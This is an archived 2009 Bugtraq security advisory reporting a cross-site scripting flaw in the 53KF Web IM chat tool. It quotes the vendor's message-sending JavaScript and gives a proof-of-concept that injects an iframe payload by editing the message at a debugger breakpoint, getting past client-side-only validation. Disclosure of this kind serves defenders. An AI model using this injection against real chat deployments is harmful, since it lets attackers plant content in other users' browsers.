53KF Web IM 2009 Cross-Site Scripting Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: 53KF Web IM 2009 Cross-Site Scripting Vulnerabilities
From: Heart <xisigr@xxxxxxxxx>
Date: Mon, 19 Jan 2009 11:26:25 +0800
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type:content-transfer-encoding; bh=fNFLFPA07pA7UD1264KkQxcNeuJ/n4QguQ1gaGxYmrQ=; b=up0eK8M6e6zHwcwt3pk9pmSP4aZmbjSlCxkXXe65vimYPfHKpG4sxfF6gpELF9MtWg P1np4NXBrUg0PhJx5KSoMZLMNMbPY9T0vIT5Z+gFJxyy7MVZR536Bn+/maXFh2BhbCXY DGGb9ikr5KKxc4xMICHa5Ty4m4G391BGfbnTY=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type :content-transfer-encoding; b=R4wPh4lBPK9Zzv6fiecoeku8PbTnFXKmWCgKtD4pF+QXbcupaaCj/jPBYw7fFC5Vn4 vyZUUwcy+Z+GqlfkNg0WZJxiri8hoemYnVi9TVcD2AP2PcNTKvyzGkz2wa4Y+3f0563U QQ2gfdPxDUcWqdJQQKhpdXXOUAYeB5uPrBGGM=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Application: 53KF Web IM
Vendor: www.53kf.com
Corporation: LiuDu, Inc.
Version: Latest: (19 JAN 2009) - Home Edition, Enterprise & Professional
Description: 53KF Web IM 2009 Cross-Site Scripting Vulnerabilities

Background:
==============
53KF is a web-based group chat tool that lets invite a client,
colleague, or vendor to chat, and collaborate.More than 220,000
websites in the use of 53KF.

Vulnerability:
==============
They do not properly sanitize the potentially malicious input content
to be rendered and, as a result, an attacker might provide malicious
HTML content as part of an IM message. There is a client-side only
input validation.

Exploit:
==============

156function sendmsg() {
157 try{textCounter(document.getElementById("input1"),1000)}catch(e){}
158 msg=document.getElementById("input1").value;
159 if (msg.trim()=="") {
160 return;
161 }
162 msg=UBBEncode(msg);
163 document.getElementById("input1").value="";
164 display_msg("<font color=\"#666666\">"+infos[13]+":
"+getTime2()+"</font><br>&nbsp;&nbsp;"+UBBCode(msg.trim()));
165 try{msg=msgFilter(msg);}catch(e){}
166 if(usezzdy=="1"){
167 var rmsg=sendtext(msg);
168 display_msg("<font
color=\"#666666\">"+infos[57]+":</font><br>&nbsp;&nbsp;<font
color=\"#0000CE\">"+rmsg+"</font>");
169 }else{
170 if (typeof(rec_stat)!="undefined" && rec_stat==1){
171 push_info("post","REC",mytempid,"11",UBBCode(msg.trim()),getTime());
172 display_msg("<font
color=\"#666666\">"+infos[29]+":</font><br>&nbsp;&nbsp;<font
color=\"#0000CE\">"+UBBCode(UBBEncode(lword_prompt))+"</font>");
173 }
174 else{
175 qstmsg(UBBCode(msg.trim()));
176 }
177 }
178 if (talk_fee_type==1)
179 {
180 talk_fee_type=0;
181 
url="http://www.53kf.cn/v5_talk.php?talk_fee_type=1&arg="+arg+"&style="+style;
182 rpc(url);
183 }
184
185 if(istalktype==1)
186 {
187 istalktype=0;
188 url="http://www.53kf.cn/istalk.php?companyid="+company_id+"&istalk=1";;
189 rpc(url);
190 }
191}

SET BREAKPOINT(firebug, etc) AT 164TH LINE, AND SET NEW VALUE:
msg = "<iframe width=800 height=600 src='httP://WWW.g.cn'></iframe>"

=========================
xisigr[topsec]
xisigr@xxxxxxxxx


--
-----------------------------------------------------------------
NAME:xushaopei(xsp)
ORG:Heart[T.P.S][F.S.T][J.I.C]
QQ:9634989
EMAIL:xisigr@xxxxxxxxx
BLOG:http://www.hackheart.com
-----------------------------------------------------------------

Prev by Date: Ralinktech wireless cards drivers vulnerability
Next by Date: [Wintercore Research ] Fujitsu SystemcastWizard Lite PXEService Remote Buffer Overflow.
Previous by thread: Ralinktech wireless cards drivers vulnerability
Next by thread: [Wintercore Research ] Fujitsu SystemcastWizard Lite PXEService Remote Buffer Overflow.
Index(es):
- Date
- Thread